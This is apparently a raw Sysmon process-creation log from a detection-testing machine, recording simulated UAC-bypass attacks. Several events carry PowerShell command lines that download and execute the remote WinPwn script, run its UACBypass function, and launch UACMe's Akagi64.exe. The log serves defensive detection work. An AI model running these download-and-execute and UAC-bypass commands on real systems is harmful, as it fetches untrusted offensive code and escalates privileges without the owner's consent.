"c:\Users\VICTIM\AppData\Local\Temp\CSCF1FA2C77750C47DBAD8EEF3490134B23.TMP"C:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=76C1219AF982CDFD4C2ED915EB4AE0EE99895C01,MD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF{51A89197-C7CF-6552-7B03-000000001E00}3056C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\VICTIM\AppData\Local\Temp\dnj2cx2y.cmdline"ATTACKBOX-WIN10\VICTIM 154100x8000000000000000685861Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:19.670{51A89197-C7CF-6552-7C03-000000001E00}3364C:\Windows\System32\dllhost.exe10.0.17134.1 (WinBuild.160101.0800)COM SurrogateMicrosoft® Windows® Operating SystemMicrosoft Corporationdllhost.exeC:\Windows\system32\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}C:\Windows\system32\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=257815EF5AC9E0408D327C5D1627D4C3795FF341,MD5=2528137C6745C4EADD87817A1909677E,SHA256=204FD3DA29E9197A7E82AB628E017A74082934E87092AFE18D253446608E0971,IMPHASH=68E651F131674892AE7E46556EB24726{51A89197-BE59-6552-0F00-000000001E00}756C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -pNT AUTHORITY\SYSTEM 154100x8000000000000000685842Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:19.644{51A89197-C7CF-6552-7B03-000000001E00}3056C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe4.7.3056.0 built by: NET472REL1Visual C# Command Line CompilerMicrosoft® .NET FrameworkMicrosoft Corporationcsc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\VICTIM\AppData\Local\Temp\dnj2cx2y.cmdline"C:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=311F2313016303A7B0296FCFA1E821905FF84304,MD5=B46100977911A0C9FB1C3E5F16A5017D,SHA256=DB58611DD100D2280FAD9BB38982FC287A46C42DD8C2F5C964C5796AB9371FE6,IMPHASH=9C5140449778B9B7CEF1476457A218C0{51A89197-C7CD-6552-7703-000000001E00}7724C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & {$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') UACBypass -noninteractive -command \""C:\windows\system32\calc.exe\"" -technique ccmstp}ATTACKBOX-WIN10\VICTIM 154100x8000000000000000685415Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:19.446{51A89197-C7CF-6552-7A03-000000001E00}3184C:\Windows\System32\consent.exe10.0.17134.677 (WinBuild.160101.0800)Consent UI for administrative applicationsMicrosoft® Windows® Operating SystemMicrosoft Corporationconsent.execonsent.exe 368 354 0000025DF26E2720C:\Windows\system32\NT AUTHORITY\SYSTEM{51A89197-BE59-6552-E703-000000000000}0x3e71SystemSHA1=46776A2D63FF16E07EC79F666378F28F6FC770B6,MD5=9BF568CAC95DC11234078BA936B1DDFF,SHA256=CC48981C30BEE846DC04538A7F45D505C37F39F2384483D97E8D52B9D0E52C7D,IMPHASH=522D83761201075834F05037F5307949{51A89197-BE5A-6552-1300-000000001E00}368C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -pNT AUTHORITY\SYSTEM 154100x8000000000000000685138Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:19.267{51A89197-C7CF-6552-7903-000000001E00}6520C:\Windows\System32\cmstp.exe7.2.17134.1 (WinBuild.160101.0800)Microsoft Connection Manager Profile InstallerMicrosoft(R) Connection ManagerMicrosoft CorporationCMSTP.EXE"c:\windows\system32\cmstp.exe" /au C:\Users\VICTIM\AppData\Local\Temp\CMSTP.infC:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=84AA48946D4F9A9DFE4C1AF6F96C44B643229A73,MD5=2A9828E0C405422D166E0141054A04B3,SHA256=94152FB98573FE31C0CE49D260D760DD173741D663414DE718A37AAC7E8EF11F,IMPHASH=109BA8ED3C458360A74EA1216207CA09{51A89197-C7CD-6552-7703-000000001E00}7724C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & {$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') UACBypass -noninteractive -command \""C:\windows\system32\calc.exe\"" -technique ccmstp}ATTACKBOX-WIN10\VICTIM 154100x8000000000000000684971Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:17.638{51A89197-C7CD-6552-7803-000000001E00}3976C:\Windows\System32\conhost.exe10.0.17134.1 (WinBuild.160101.0800)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXE\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1C:\WindowsATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=8F9BC1B7D65188D0ADBDF74CCCE4EED78BF4C129,MD5=EA777DEEA782E8B4D7C7C33BBF8A4496,SHA256=04B6A35BC504401989B9E674C57C9E84D0CBDBBD9D8CE0CE83D7CECA0B7175ED,IMPHASH=63E065B05DF33ACB4D95B3DD04670B8F{51A89197-C7CD-6552-7703-000000001E00}7724C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & {$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') UACBypass -noninteractive -command \""C:\windows\system32\calc.exe\"" -technique ccmstp}ATTACKBOX-WIN10\VICTIM 154100x8000000000000000684965Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:17.629{51A89197-C7CD-6552-7703-000000001E00}7724C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.17134.1 (WinBuild.160101.0800)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"powershell.exe" & {$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') UACBypass -noninteractive -command \""C:\windows\system32\calc.exe\"" -technique ccmstp}C:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=1B3B40FBC889FD4C645CC12C85D0805AC36BA254,MD5=95000560239032BC68B4C2FDFCDEF913,SHA256=D3F8FADE829D2B7BD596C4504A6DAE5C034E789B6A3DEFBE013BDA7D14466677,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F{51A89197-C74B-6552-9C02-000000001E00}6296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKBOX-WIN10\VICTIM 154100x8000000000000000684872Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:17.164{51A89197-C7CD-6552-7603-000000001E00}772C:\Windows\System32\conhost.exe10.0.17134.1 (WinBuild.160101.0800)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXE\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1C:\WindowsATTACKBOX-WIN10\VICTIM{51A89197-C7CD-6552-080E-C70000000000}0xc70e081HighSHA1=8F9BC1B7D65188D0ADBDF74CCCE4EED78BF4C129,MD5=EA777DEEA782E8B4D7C7C33BBF8A4496,SHA256=04B6A35BC504401989B9E674C57C9E84D0CBDBBD9D8CE0CE83D7CECA0B7175ED,IMPHASH=63E065B05DF33ACB4D95B3DD04670B8F{51A89197-C7CD-6552-7503-000000001E00}5344C:\Windows\System32\cmd.exe"C:\windows\system32\cmd.exe"ATTACKBOX-WIN10\VICTIM 154100x8000000000000000684865Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:17.155{51A89197-C7CD-6552-7503-000000001E00}5344C:\Windows\System32\cmd.exe10.0.17134.1 (WinBuild.160101.0800)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\windows\system32\cmd.exe"C:\Windows\ATTACKBOX-WIN10\VICTIM{51A89197-C7CD-6552-080E-C70000000000}0xc70e081HighSHA1=3CE71813199ABAE99348F61F0CAA34E2574F831C,MD5=4E2ACF4F8A396486AB4268C94A6A245F,SHA256=9A7C58BD98D70631AA1473F7B57B426DB367D72429A5455B433A05EE251F3236,IMPHASH=8542FB14699D84D7E8DA92F66145C7FE{51A89197-C7C8-6552-6C03-000000001E00}2756C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & {$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') UACBypass -noninteractive -command \""C:\windows\system32\cmd.exe\"" -technique magic}ATTACKBOX-WIN10\VICTIM 154100x8000000000000000684784Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:16.851{51A89197-C7CC-6552-7403-000000001E00}7088C:\Windows\System32\wusa.exe10.0.17134.1 (WinBuild.160101.0800)Windows Update Standalone InstallerMicrosoft® Windows® Operating SystemMicrosoft Corporationwusa.exe"C:\Windows\System32\wusa.exe" C:\Windows\system32\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=76FA00103A89C735573D1D8946D8787A839475B6,MD5=04CE745559916B99248F266BBF5F9ED9,SHA256=1D86701A861FFA88FE050A466E04281A4809C334B16832A84231DC6A5FBC4195,IMPHASH=FC972ECD133FF77EF8CFBA8B3DF03C97{51A89197-C7C8-6552-6C03-000000001E00}2756C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & {$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') UACBypass -noninteractive -command \""C:\windows\system32\cmd.exe\"" -technique magic}ATTACKBOX-WIN10\VICTIM 154100x8000000000000000684755Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:16.785{51A89197-C7CC-6552-7303-000000001E00}2380C:\Windows\System32\dllhost.exe10.0.17134.1 (WinBuild.160101.0800)COM SurrogateMicrosoft® Windows® Operating SystemMicrosoft Corporationdllhost.exeC:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}C:\Windows\system32\NT AUTHORITY\SYSTEM{51A89197-BE59-6552-E703-000000000000}0x3e70SystemSHA1=257815EF5AC9E0408D327C5D1627D4C3795FF341,MD5=2528137C6745C4EADD87817A1909677E,SHA256=204FD3DA29E9197A7E82AB628E017A74082934E87092AFE18D253446608E0971,IMPHASH=68E651F131674892AE7E46556EB24726{51A89197-BE59-6552-0F00-000000001E00}756C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -pNT AUTHORITY\SYSTEM 154100x8000000000000000684712Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:16.711{51A89197-C7CC-6552-7203-000000001E00}5608C:\Windows\System32\dllhost.exe10.0.17134.1 (WinBuild.160101.0800)COM SurrogateMicrosoft® Windows® Operating SystemMicrosoft Corporationdllhost.exeC:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}C:\Windows\system32\NT AUTHORITY\SYSTEM{51A89197-BE59-6552-E703-000000000000}0x3e71SystemSHA1=257815EF5AC9E0408D327C5D1627D4C3795FF341,MD5=2528137C6745C4EADD87817A1909677E,SHA256=204FD3DA29E9197A7E82AB628E017A74082934E87092AFE18D253446608E0971,IMPHASH=68E651F131674892AE7E46556EB24726{51A89197-BE59-6552-0F00-000000001E00}756C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -pNT AUTHORITY\SYSTEM 154100x8000000000000000684466Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:16.579{51A89197-C7CC-6552-7103-000000001E00}2552C:\Windows\System32\consent.exe10.0.17134.677 (WinBuild.160101.0800)Consent UI for administrative applicationsMicrosoft® Windows® Operating SystemMicrosoft Corporationconsent.execonsent.exe 368 294 0000025DF47437E0C:\Windows\system32\NT AUTHORITY\SYSTEM{51A89197-BE59-6552-E703-000000000000}0x3e71SystemSHA1=46776A2D63FF16E07EC79F666378F28F6FC770B6,MD5=9BF568CAC95DC11234078BA936B1DDFF,SHA256=CC48981C30BEE846DC04538A7F45D505C37F39F2384483D97E8D52B9D0E52C7D,IMPHASH=522D83761201075834F05037F5307949{51A89197-BE5A-6552-1300-000000001E00}368C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -pNT AUTHORITY\SYSTEM 154100x8000000000000000684433Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:16.555{51A89197-C7CC-6552-7003-000000001E00}8060C:\Windows\System32\wusa.exe10.0.17134.1 (WinBuild.160101.0800)Windows Update Standalone InstallerMicrosoft® Windows® Operating SystemMicrosoft Corporationwusa.exe"C:\Windows\System32\wusa.exe" C:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=76FA00103A89C735573D1D8946D8787A839475B6,MD5=04CE745559916B99248F266BBF5F9ED9,SHA256=1D86701A861FFA88FE050A466E04281A4809C334B16832A84231DC6A5FBC4195,IMPHASH=FC972ECD133FF77EF8CFBA8B3DF03C97{51A89197-C7C8-6552-6C03-000000001E00}2756C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & {$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') UACBypass -noninteractive -command \""C:\windows\system32\cmd.exe\"" -technique magic}ATTACKBOX-WIN10\VICTIM 154100x8000000000000000684391Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:16.310{51A89197-C7CC-6552-6F03-000000001E00}6292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe12.00.52519.0 built by: VSWINSERVICINGMicrosoft® Resource File To COFF Object Conversion UtilityMicrosoft® .NET FrameworkMicrosoft CorporationCVTRES.EXEC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\VICTIM\AppData\Local\Temp\RES5A9.tmp" "c:\Users\VICTIM\AppData\Local\Temp\CSC2CCDD382BF7B42C097966CDD1BB7183F.TMP"C:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=76C1219AF982CDFD4C2ED915EB4AE0EE99895C01,MD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF{51A89197-C7CC-6552-6E03-000000001E00}7148C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\VICTIM\AppData\Local\Temp\jpceq0d1.cmdline"ATTACKBOX-WIN10\VICTIM 154100x8000000000000000684349Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:16.121{51A89197-C7CC-6552-6E03-000000001E00}7148C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe4.7.3056.0 built by: NET472REL1Visual C# Command Line CompilerMicrosoft® .NET FrameworkMicrosoft Corporationcsc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\VICTIM\AppData\Local\Temp\jpceq0d1.cmdline"C:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=311F2313016303A7B0296FCFA1E821905FF84304,MD5=B46100977911A0C9FB1C3E5F16A5017D,SHA256=DB58611DD100D2280FAD9BB38982FC287A46C42DD8C2F5C964C5796AB9371FE6,IMPHASH=9C5140449778B9B7CEF1476457A218C0{00000000-0000-0000-0000-000000000000}2756--- 154100x8000000000000000683998Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:12.197{51A89197-C7C8-6552-6D03-000000001E00}3216C:\Windows\System32\conhost.exe10.0.17134.1 (WinBuild.160101.0800)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXE\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1C:\WindowsATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=8F9BC1B7D65188D0ADBDF74CCCE4EED78BF4C129,MD5=EA777DEEA782E8B4D7C7C33BBF8A4496,SHA256=04B6A35BC504401989B9E674C57C9E84D0CBDBBD9D8CE0CE83D7CECA0B7175ED,IMPHASH=63E065B05DF33ACB4D95B3DD04670B8F{51A89197-C7C8-6552-6C03-000000001E00}2756C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & {$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') UACBypass -noninteractive -command \""C:\windows\system32\cmd.exe\"" -technique magic}ATTACKBOX-WIN10\VICTIM 154100x8000000000000000683991Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:12.128{51A89197-C7C8-6552-6C03-000000001E00}2756C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.17134.1 (WinBuild.160101.0800)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"powershell.exe" & {$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') UACBypass -noninteractive -command \""C:\windows\system32\cmd.exe\"" -technique magic}C:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=1B3B40FBC889FD4C645CC12C85D0805AC36BA254,MD5=95000560239032BC68B4C2FDFCDEF913,SHA256=D3F8FADE829D2B7BD596C4504A6DAE5C034E789B6A3DEFBE013BDA7D14466677,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F{51A89197-C74B-6552-9C02-000000001E00}6296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKBOX-WIN10\VICTIM 154100x8000000000000000683842Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:08.187{51A89197-C7C4-6552-6B03-000000001E00}952C:\Windows\System32\conhost.exe10.0.17134.1 (WinBuild.160101.0800)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXE\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1C:\WindowsATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=8F9BC1B7D65188D0ADBDF74CCCE4EED78BF4C129,MD5=EA777DEEA782E8B4D7C7C33BBF8A4496,SHA256=04B6A35BC504401989B9E674C57C9E84D0CBDBBD9D8CE0CE83D7CECA0B7175ED,IMPHASH=63E065B05DF33ACB4D95B3DD04670B8F{51A89197-C7C4-6552-6A03-000000001E00}7528C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" ATTACKBOX-WIN10\VICTIM 154100x8000000000000000683832Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:08.175{51A89197-C7C4-6552-6A03-000000001E00}7528C:\Windows\System32\cmd.exe10.0.17134.1 (WinBuild.160101.0800)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" C:\Windows\system32\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=3CE71813199ABAE99348F61F0CAA34E2574F831C,MD5=4E2ACF4F8A396486AB4268C94A6A245F,SHA256=9A7C58BD98D70631AA1473F7B57B426DB367D72429A5455B433A05EE251F3236,IMPHASH=8542FB14699D84D7E8DA92F66145C7FE{51A89197-C7C3-6552-6903-000000001E00}7928C:\Windows\System32\changepk.exe"C:\Windows\system32\ChangePk.exe" ATTACKBOX-WIN10\VICTIM 154100x8000000000000000683452Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:07.838{51A89197-C7C3-6552-6903-000000001E00}7928C:\Windows\System32\changepk.exe10.0.17134.1 (WinBuild.160101.0800)Windows ActivationMicrosoft® Windows® Operating SystemMicrosoft Corporationchangepk.exe"C:\Windows\system32\ChangePk.exe" C:\Windows\system32\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=81EE099CB3CE1CC7DCEE08C4F29A9F277A920069,MD5=2B29E820325F39685C53A9EC2D919FE2,SHA256=83D4E9944FED7EC8B4B0D7FBBFD50D8F24C58622ABBC43157A0F8F6983086B0C,IMPHASH=EE5F6B3569A8EE40ED33F2B9CA2883A9{51A89197-C7C3-6552-6803-000000001E00}184C:\Windows\System32\slui.exe"C:\Windows\system32\slui.exe" 0x03ATTACKBOX-WIN10\VICTIM 154100x8000000000000000683184Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:07.574{51A89197-C7C3-6552-6803-000000001E00}184C:\Windows\System32\slui.exe10.0.17134.1 (WinBuild.160101.0800)Windows Activation ClientMicrosoft® Windows® Operating SystemMicrosoft Corporationslui.exe"C:\Windows\system32\slui.exe" 0x03C:\Windows\system32\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=02DFA07143911500925C6298864477296F414AB0,MD5=96A8EF9387619D17BB30B024DDF52BF3,SHA256=ECC41BB93E0E1EA63A1027D551BA0FCE503E53EF1BA2E70944FD7E7C7C9A9B8A,IMPHASH=28B27ED7142C9F97A3A0A1D893305C1F{51A89197-C7C3-6552-6703-000000001E00}5260C:\Windows\System32\slui.exe"C:\Windows\system32\slui.exe" ATTACKBOX-WIN10\VICTIM 154100x8000000000000000682875Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:07.242{51A89197-C7C3-6552-6703-000000001E00}5260C:\Windows\System32\slui.exe10.0.17134.1 (WinBuild.160101.0800)Windows Activation ClientMicrosoft® Windows® Operating SystemMicrosoft Corporationslui.exe"C:\Windows\system32\slui.exe" C:\Windows\system32\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=02DFA07143911500925C6298864477296F414AB0,MD5=96A8EF9387619D17BB30B024DDF52BF3,SHA256=ECC41BB93E0E1EA63A1027D551BA0FCE503E53EF1BA2E70944FD7E7C7C9A9B8A,IMPHASH=28B27ED7142C9F97A3A0A1D893305C1F{51A89197-C7C2-6552-6503-000000001E00}4036C:\DetectionTesting\Temp\ExternalPayloads\uacme\61 Akagi64.exe"C:\DetectionTesting\Temp\atomics\..\ExternalPayloads\uacme\61 Akagi64.exe"ATTACKBOX-WIN10\VICTIM 154100x8000000000000000682616Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:07.047{51A89197-C7C3-6552-6603-000000001E00}7948C:\Windows\System32\consent.exe10.0.17134.677 (WinBuild.160101.0800)Consent UI for administrative applicationsMicrosoft® Windows® Operating SystemMicrosoft Corporationconsent.execonsent.exe 368 294 0000025DF4742AC0C:\Windows\system32\NT AUTHORITY\SYSTEM{51A89197-BE59-6552-E703-000000000000}0x3e71SystemSHA1=46776A2D63FF16E07EC79F666378F28F6FC770B6,MD5=9BF568CAC95DC11234078BA936B1DDFF,SHA256=CC48981C30BEE846DC04538A7F45D505C37F39F2384483D97E8D52B9D0E52C7D,IMPHASH=522D83761201075834F05037F5307949{51A89197-BE5A-6552-1300-000000001E00}368C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -pNT AUTHORITY\SYSTEM 154100x8000000000000000682517Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:06.823{51A89197-C7C2-6552-6503-000000001E00}4036C:\DetectionTesting\Temp\ExternalPayloads\uacme\61 Akagi64.exe3.5.4.2012Pentesting utilityUACMeIntegrity Investment LLCAkagi.exe"C:\DetectionTesting\Temp\atomics\..\ExternalPayloads\uacme\61 Akagi64.exe"C:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=8E290B4847BE1426A47228F3FEDF9F40B093905D,MD5=95FA285D070D40687639C66605AA4232,SHA256=BA2588DBA2CFEF38361ADC775B7EFDCA61976446DD18B5303FCE9E99ED610A6D,IMPHASH=49F99D1CD91BD039949B1E3472B20922{51A89197-C7C2-6552-6303-000000001E00}4320C:\Windows\System32\cmd.exe"cmd.exe" /c "C:\DetectionTesting\Temp\atomics\..\ExternalPayloads\uacme\61 Akagi64.exe"ATTACKBOX-WIN10\VICTIM 154100x8000000000000000682485Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:06.747{51A89197-C7C2-6552-6403-000000001E00}200C:\Windows\System32\conhost.exe10.0.17134.1 (WinBuild.160101.0800)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXE\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1C:\WindowsATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=8F9BC1B7D65188D0ADBDF74CCCE4EED78BF4C129,MD5=EA777DEEA782E8B4D7C7C33BBF8A4496,SHA256=04B6A35BC504401989B9E674C57C9E84D0CBDBBD9D8CE0CE83D7CECA0B7175ED,IMPHASH=63E065B05DF33ACB4D95B3DD04670B8F{51A89197-C7C2-6552-6303-000000001E00}4320C:\Windows\System32\cmd.exe"cmd.exe" /c "C:\DetectionTesting\Temp\atomics\..\ExternalPayloads\uacme\61 Akagi64.exe"ATTACKBOX-WIN10\VICTIM 154100x8000000000000000682478Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:06.733{51A89197-C7C2-6552-6303-000000001E00}4320C:\Windows\System32\cmd.exe10.0.17134.1 (WinBuild.160101.0800)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"cmd.exe" /c "C:\DetectionTesting\Temp\atomics\..\ExternalPayloads\uacme\61 Akagi64.exe"C:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=3CE71813199ABAE99348F61F0CAA34E2574F831C,MD5=4E2ACF4F8A396486AB4268C94A6A245F,SHA256=9A7C58BD98D70631AA1473F7B57B426DB367D72429A5455B433A05EE251F3236,IMPHASH=8542FB14699D84D7E8DA92F66145C7FE{51A89197-C74B-6552-9C02-000000001E00}6296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKBOX-WIN10\VICTIM 154100x8000000000000000682396Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:06.161{51A89197-C7C2-6552-6203-000000001E00}7244C:\Windows\System32\conhost.exe10.0.17134.1 